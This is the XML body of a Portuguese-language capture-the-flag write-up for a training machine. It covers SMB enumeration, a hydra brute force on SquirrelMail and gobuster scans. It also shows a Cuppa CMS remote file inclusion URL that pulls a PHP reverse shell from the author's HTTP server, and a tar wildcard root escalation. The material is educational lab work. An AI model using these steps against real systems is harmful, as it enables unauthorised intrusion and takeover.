            <wp:docPr id="1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D675293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FD7AF49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06C743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BB31CA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15EEEC3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1FA7C3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17D225A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89BA9A5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6C7D55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B503F7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0A0E3B3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74C078B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ACA3E34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BC14CF9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1B2BE82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14330BB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49B155EB" w14:textId="491CE449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Log1.txt aparenta ser um arquivo de senhas, volto no squirrelmail e rodo um bruteforce com hydra utilizando o usu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rio milesdyson e log1.txt como possíveis senhas, encontrando a primeira como sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339FD00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5" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6F4B21E1" wp14:editId="305FA48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34030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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0D836F3" w14:textId="77777777" w:rsidR="008405CE" w:rsidRDefault="008405CE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</w:p>
    <w:p w14:paraId="52ABC0AA" w14:textId="746E91B1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lastRenderedPageBreak/>
        <w:t>What is the hidden directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B2788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Dentro do e-mail, descubro a seguinte senha:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F843DB" w14:textId="57E9DD2A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6" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6037CF8B" wp14:editId="5821F50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987550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="15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8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EEEA9DB" w14:textId="5AE5BFC5" w:rsidR="008405CE" w:rsidRDefault="00000000">
      <w:pPr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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="47" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="29C26FE7" wp14:editId="234BC0A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33395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="16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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Voltando ao smbclient, em vez de anonymous tento dar login com milesdyson </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4FEBEB" w14:textId="47053C7F" w:rsidR="00126C16" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"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utilizando a senha descoberta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343DAE09" w14:textId="77777777" w:rsidR="008405CE" w:rsidRDefault="008405CE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81A7B86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48" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2C2A379C" wp14:editId="6AA421F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5425" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="17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01A5E9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946BA80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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="49" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="35B77604" wp14:editId="5A3752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638935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="18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96DBF0D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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="175BDA3D" wp14:editId="39D020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90850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="19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474DE8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1" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="00757CB5" wp14:editId="363DC9B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14825" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="20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484A49B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FABBAA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A248B89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709CBB4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DC7F4C1" w14:textId="4CE5EA0B" w:rsidR="00126C16" w:rsidRPr="003D7612" w:rsidRDefault="00000000" w:rsidP="003D7612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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Encontrei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diret</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>escondido</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A4512" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612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</w:p>
    <w:p w14:paraId="28D5AD7B" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612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</w:p>
    <w:p w14:paraId="7D4FE77D" w14:textId="62678CCD" w:rsidR="003D7612" w:rsidRDefault="003D7612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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39918B3C" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612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</w:p>
    <w:p w14:paraId="0B057BDD" w14:textId="286D1F20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the vulnerability called when you can include a remote file for malicious purposes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D8867" w14:textId="77777777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R: Remote file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116BD52" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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</w:p>
    <w:p w14:paraId="2069CDD4" w14:textId="77777777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 xml:space="preserve">What is the user flag?  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A0C18" w14:textId="30815895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Acessando o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 me deparo com a seguinte p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gina. Por</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m ela não tem nenhuma informa</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o importante, rodo um gobuster mais uma vez para encontrar novos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rios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7EB28A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2" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="7B70B138" wp14:editId="2D4BB60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639820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="21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39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99405FE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62" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4C9391D9" wp14:editId="544F011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282190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="22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EB69B0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E66D090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95BD671" w14:textId="03DBD1BE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Indo no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 de administrador, me encontro com a seguinte p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 xml:space="preserve">gina. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E7461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E03AA72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63" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="75EA4963" wp14:editId="380E60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744595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="23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4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DAE9EF9" w14:textId="56334D2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Indo ao ExploitDB, encontro uma vulnerabilidade do Cuppa CMS onde utilizando um query espec</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fico consigo rodar remote file inclusion utilizando um shell php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F157BD8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http://IP/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=SERVIDOR-HTTP/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163CC897" w14:textId="77777777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isso, primeiro vou iniciar um servidor http com python para que eu possa fazer um get do meu shell, adicionalmente ativo um nc para escutar na porta escolhida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E80865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4" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1A92A95F" wp14:editId="07786B18">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="1211580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="24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1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96E5BB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53" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="31B1396F" wp14:editId="76F516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875790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="25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F80502" w14:textId="456EA623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Entrando na m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quina, come</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o a andar pelos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rios, encontro a user flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E501E8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p w14:paraId="0086F594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5" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3363F85C" wp14:editId="1D3BAA2E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>646430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-74295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3867150" cy="4772025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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77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487EF81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DFBFF4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77E37AA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02A56F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35806C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3088BC1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9E6634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67C41E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7FA5A2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A6216A2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00B3E16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A59A7E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C8C62C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0B635C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93AB43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C208B69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790E986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64" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14FC6880" wp14:editId="3241BC69">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>723265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-31750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2390775" cy="171450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27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6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4C67C47D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              </w:rPr>
                              <w:t>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX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FC6880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margin-left:56.95pt;margin-top:-2.5pt;width:188.25pt;height:13.5pt;z-index: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" filled="f" stroked="f" strokeweight="0">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4C67C47D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        </w:rPr>
                        <w:t>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BA43A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FB82A25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735CEF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652C25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FF72654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786355C" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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r w:rsidRPr="004225B7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lastRenderedPageBreak/>
        <w:t>What is the root flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA0A40" w14:textId="6174ADAE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Indo para tmp, consigo adicionar arquivos na m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quina, assim utilizo o meu servidor http e dou um get no script LinEnum.sh, capaz de fazer uma enumera</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56280E71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6" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1EE5CDAE" wp14:editId="71105543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5400040" cy="4333875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="28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3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9BEF30B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D7EDFB7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7" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1AA3EF5E" wp14:editId="1E229EB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05400" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="29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59267A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225FC9A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6585119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58" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="312FF42D" wp14:editId="17B73B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744595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="30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4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52C0BEB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5D1F60F" w14:textId="19E36409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Porem, não encontro nenhuma informa</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o que posso usar. Depois disso, volto para o diretorio milesdyson para ver se encontro algo que possa me ajudar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D9866C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E06C96F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60" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6B701066" wp14:editId="45321BA8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4743450" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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56A65E5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DD3A901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C0768A7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346879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3CD6DAD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AF53EF2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D7C8D20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3E3EDBD8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C84B16F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9979922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7DA94D4" w14:textId="30B87BC6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Descubro esse script. Vou para o diret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rio rodando tar e rodar sudo, por</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">m não consigo por conta do erro de tty. Para resolver, importo uma shell utilizando python. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C5CF0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ED62773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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="61" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2E5BC696" wp14:editId="11DE38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14850" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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8B42C75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31A81DB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0AF4AA58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6737A824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D3A536E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219F8173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7F35CE1F" w14:textId="013BE42A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Descubro uma vulnerabilidade de wildcards do tar no Linux, onde ao usar * com tar, os arquivos vao ser passados para o bin</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rio do tar e os comandos que eu utilizar vao ser executados como root. Encontro a flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E31880D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65" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1519BA45" wp14:editId="170BB798">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-285115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1630680</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1675765" cy="171450"/>
                <wp:effectExtent l="1270" t="13970" r="1905" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="33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1543600">
                          <a:off x="0" y="0"/>
                          <a:ext cx="167580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DC00C8D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              </w:rPr>
                              <w:t>XXXXXXXXXXXXXXXXXXXXX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9BA45" id="Text Frame 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:-22.45pt;margin-top:128.4pt;width:131.95pt;height:13.5pt;rotation:-61604fd;z-index:6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" filled="f" stroked="f" strokeweight="0">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7DC00C8D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        </w:rPr>
                        <w:t>XXXXXXXXXXXXXXXXXXXXX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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:smallCaps/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="59" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="378F037B" wp14:editId="0485678B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-342900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5987415" cy="1871345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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415" cy="187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D3D4040" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16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11D6B5D0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2" w:name="_heading=h.1t3h5sf"/>
      <w:bookmarkEnd w:id="2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Conclusão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509A8E0" w14:textId="39FDFECB" w:rsidR="00126C16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CTF foi uma </w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tima oportunidade para treinar meus conhecimentos em Privilege escalation e exploitation de vulnerabilidades. Tamb</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m tive a oportunidade de descobrir outras ferramentas do Kali como smbmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0A20C" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
      <w:pP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3" w:name="_heading=h.4d34og8"/>
      <w:bookmarkEnd w:id="3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Referências</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437565D3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39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https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/?ref=blog.tryhackme.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09D023BA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0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https://www.revshells.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10F74268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1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https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78BB4D38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2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https://medium.com/@uukail2005/samba-smbd-3-x-4-x-exploitation-59a8d9431ea1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="448E5B73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3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https://tldp.org/HOWTO/SMB-HOWTO-8.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2457193B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4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https://github.com/CuppaCMS/CuppaCMS/issues/33</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C6FA6BA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5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https://www.exploit-db.com/exploits/25971</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="225C138D" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="003D7612" w:rsidRDefault="00126C16" w:rsidP="003D7612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46">
        <w:r w:rsidRPr="003D7612">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/rebootuser/LinEnum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4166C3DE" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00126C16">
      <w:headerReference w:type="default" r:id="rId47"/>
      <w:footerReference w:type="default" r:id="rId48"/>
      <w:headerReference w:type="first" r:id="rId49"/>
      <w:footerReference w:type="first" r:id="rId50"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="261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56E65" w14:textId="77777777" w:rsidR="00700B42" w:rsidRDefault="00700B42">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A49BAAE" w14:textId="77777777" w:rsidR="00700B42" w:rsidRDefault="00700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AC43360-CEBE-489E-AEEC-54C87AF7716B}"/>
    <w:embedBold r:id="rId2" w:fontKey="{6201D24F-D5B8-40D1-B46E-54659A4E936E}"/>
    <w:embedItalic r:id="rId3" w:fontKey="{E320FFB1-2363-4900-9208-ADF0A8F576A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3F9197C0-197F-4247-BE29-12C2A779803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5" w:fontKey="{CBCBC5B9-33A2-4F27-A37D-07C202CCA95D}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6" w:fontKey="{229E0F6D-D6FD-4D19-8F78-DD636707D1ED}"/>
  </w:font>
  <w:font w:name="FreeSans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  <w:embedRegular r:id="rId7" w:fontKey="{729286C6-9C95-4E9C-81E7-77020731805B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75B75" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
    <w:pP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AAAA | @Guardian Mauá | Confidencial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7A08E" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C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8CF17" w14:textId="77777777" w:rsidR="00700B42" w:rsidRDefault="00700B42">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="105AD74F" w14:textId="77777777" w:rsidR="00700B42" w:rsidRDefault="00700B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F9E46" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000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sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:noProof/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:drawing>
